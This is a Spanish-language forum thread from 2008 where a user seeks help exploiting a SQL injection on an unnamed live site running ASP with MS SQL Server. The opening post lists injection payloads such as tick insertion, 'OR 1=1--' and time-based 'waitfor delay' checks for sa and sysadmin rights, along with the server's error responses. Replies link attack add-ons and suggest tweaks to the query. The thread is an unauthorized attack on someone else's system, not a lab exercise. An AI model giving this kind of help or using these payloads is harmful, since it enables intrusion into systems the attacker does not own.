Título: SQL inj Publicado por: Snap90210 en 3 Marzo 2008, 03:28 am Hola a ver si alguien me puede ayudar con esto :)
Encontre una vulnerabilidad y fui siguiendo esta guia q esta en internet, pero al final sigo perdido la SQL inj esta en id="SQL", no pongo la url xq creo q aca no se pude poner, pero si alguien la quiere se la mando x pm ############## # Inserting a tick # ############## id=' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'. /lib/class/ListaProducto.asp, line 54 ######################### # Identify a valid page # ######################### id=10 Returns a valid page ################################ # Insert tick after valid page # ################################ id=10' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'. /lib/class/ListaProducto.asp, line 54 ############################### # Tried to enum db table/column name # ############################### Attempt with the tick id=10' having 1=1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' having 1=1--,-1, 1'. /lib/class/ListaProducto.asp, line 54 Attempt without the tick Returns the following error: id=10 having 1=1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'having'. /lib/class/ListaProducto.asp, line 54 ################################## # Tried the AND 1=1-- and the OR 1=1-- # ################################## Trying the AND 1=1-- id=10 AND 1=1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'AND'. /lib/class/ListaProducto.asp, line 54 Trying the OR 1=1-- id=10 or 1=1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'or'. /lib/class/ListaProducto.asp, line 54 Then tried them with the ticks id=10' AND 1=1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' AND 1=1--,-1, 1'. /lib/class/ListaProducto.asp, line 54 id=10' OR 1=1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' OR 1=1--,-1, 1'. /lib/class/ListaProducto.asp, line 54 Trying to determine if the DB is running as SA id=10; if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'-- Returned page immediately so we know it's NOT running as SA Trying to determine if it is a member of the SysAdmin group id=10; if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';-- Returned page immediately so we know it's NOT a member of the SysAdmin group ** Que puedo hacer ahora, una SQL blind injection ? como se realiza ? use varios programas pero ninguno parece dar resultado, me recomendaron el SQLninja, pero no lo pude hacerlo andar, alguien me dice como se podria hacer manualmente ? o recomendarme un programa y como usarlo ? desde ya muchas gracias .. Título: Re: SQL inj Publicado por: Shutdown -r en 29 Marzo 2008, 23:56 pm Saludos Snap no se mucho de sql injection pero tengo aqui un programa (bueno no es un programa en si) que testea la pagina web y puedes atacarla median xss o sql, aqui te los dejo ->http://www.megaupload.com/?d=MRT122J1
IMPORTANTE: para poder usar eso necesitas el mozilla firefox, pues abres la ventana de complementos y añades hay esos dos archivitos, (como ya dije no es un programa xD). Título: Re: SQL inj Publicado por: Monaco en 10 Septiembre 2008, 15:37 pm Snap90210 estoy en la misma... con MySql consigo injecciones facilmente, pero con MS SQL Server estoy perdido de como arrancar... Tubiste algun avance??? a leer sobre Microsoft SQL no queda otra saludos Título: Re: SQL inj Publicado por: Eazy en 11 Septiembre 2008, 00:27 am Proba todo lo qe dice justo despues de las palabras
Tried y Triying Título: Re: SQL inj Publicado por: sirdarckcat en 19 Septiembre 2008, 08:56 am trata no comentando el resto de la query.. osea no pongas el "--" al final
|